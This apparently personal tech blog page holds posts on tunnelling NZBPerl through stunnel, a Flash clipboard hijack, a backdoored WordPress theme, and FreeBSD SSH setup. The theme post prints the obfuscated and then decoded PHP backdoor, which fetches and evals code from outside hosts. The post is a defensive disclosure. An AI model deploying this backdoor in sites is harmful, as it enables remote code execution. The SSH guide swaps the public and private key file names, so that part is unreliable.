NZBPerl and SSL (using stunnel4)

SSL is a fairly recent addition (seemingly) to the usenet client arena, most clients that support it have only added support within the past two years or so. I’m giving NZBPerl a try, mostly because it’s the only one that fits in natively with Torrentflux b4rt. NZBPerl “technically” supports ssl (with the –ssl switch), but in practice it hangs and never really accomplishes its tasks. It’s all over teh interwebs that NZBPerl doesn’t quite work with ssl, but since the author last released in late 2006, it’s not likely to see an update to properly support ssl.

I spent about 4 hours over the weekend playing around with the source to no avail. If I could find a working patch, I would have applied it and submitted it upstream… that would have been ideal of course.

So I instead used the haxy method, wrap the nonssl nntp requests in stunnel, therefore effectively accomplishing the same goal. Here is the setup I used in Ubuntu:

# superuser assumed
apt-get install stunnel4
vim /etc/stunnel/snntp.conf
# put in the following
accept  =
connect = SECURE_NEWS_SERVER:563
# /put
stunnel4 /etc/stunnel/snttp.conf 1>>/var/log/stunnel.log 2>&1 &

Then in Torrentflux-b4rt, enable NZBPerl (ensuring prereqs match first), set the server hostname to, add your username/password to the list, and give it a try. Of course inspect /var/log/stunnel.log if there are any issues. Worked like a charm for me.

Comments (0)

Flash Clipboard Hijack

Apparently there are some malicious Adobe Flash ads out there that can hijack your browser clipboard. The issue affects Linux, Windows and OS X; Firefox, Safari and Internet Explorer — basically any client that relies on the Adobe Flash plugin. If you don’t believe it, check out the proof of concept (you have been warned). That particular site hijacks your clipboard with “http://evil.com”.

I saw this today when my browser (Firefox 3.0.1 — latest on Windows XP — patched) wouldn’t let me copy and paste text. It would be the same potentially malware [http://windowsxp-privacy.com/?id=…] result every time I CTRL-V’d. After some digging around, I realized that it was localized to my browser (I thought for sure it was a system issue at first), so to fix the issue, I closed the browser and re-opened. The issue was resolved.

Considering the manual effort required to update Flash, combined with the fact that I usually only install Flash when a computer is built and never update it, this leads me to believe this issue is widespread and not going to be fixed anytime soon. It’s a minor annoyance, but still, a pretty neat little exploit.

Comments (0)

WordPress Theme Arbitrary Code Execution

A friend of mine has a WordPress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper, and saw this in his theme’s header.php (I added the newlines for displaying purposes)

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja
UU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Which decodes to (again with the newlines)

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
 $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2,
 $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
 @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  $R3E33E017CD76B9B7E6C7364FB91E2E90 =
 @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);  @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } 

Classic arbitrary code execution attack, behind a few levels of masking.

I looked at his other themes, and saw three others with the same issue. In another theme, I saw this in footer.php


Which doesn’t turn out to be as bad, only few links (run it yourself if you’re interested, I’m not into promoting badness). But still, the fact that it’s masked is very shady.

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposefully omitted, they don’t need any more pagerank. Who knew people were so shady. I urge those looking to get WordPress Themes to stay away from sites such as these.

Edit: I found a post on GigaOM that found this same issue, and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.

Comments (3)

How to SSH w/o a password on FreeBSD

Adapted from a Berkeley Guide, if you want to be able to SSH from unix or linux boxes (e.g. FreeBSD) without having to repeatedly put in the password, this guide will show you how to do that.

First step, on the client do the following:

mkdir -p ~/.ssh
chmod 700 ~/.ssh
ssh-keygen -t rsa

Have it use the default location (~/.ssh/id_rsa), and make sure there is no passkey. This creates a file containing the public key (id_rsa) and a file containing the private key (id_rsa.pub).

There should be one line of text in id_rsa.pub. Copy it to the server, putting it in ~/.ssh/authorized_keys2. Then execute this command:

chmod 600 authorized_keys2

That’s it! Now connection from the client to the server with this command

ssh server

If that doesn’t work (i.e. it prompts for your password), you may have to try a few things. On one box that I tried, it worked as above. On another, I had to do the following.

ssh -i ~/.ssh/id_rsa server

If that works, add or create the file and insert these two lines to ~/.ssh/config

Host server
{tab}IdentityFile ~/.ssh/id_rsa

If you SSH as much as I do, this can save lots of time.

Comments (3)

FreeBSD SSH session timeouts

I was tired of seeing this while logging into my server via SSH:

Read from remote host raybdbomb.com: Connection reset by peer

I messed around with the sshd config a bit and wasn’t able to get it to go away. I’m pretty sure that the connection is being closed by some firewall in the interim. So for a solution, I installed spinner.

cd /usr/ports/sysutils/spinner/
make install clean

It puts a character on the top left of the console, which keeps the session alive with minimal amounts of data transfer.

Works great! 🙂

Comments (1)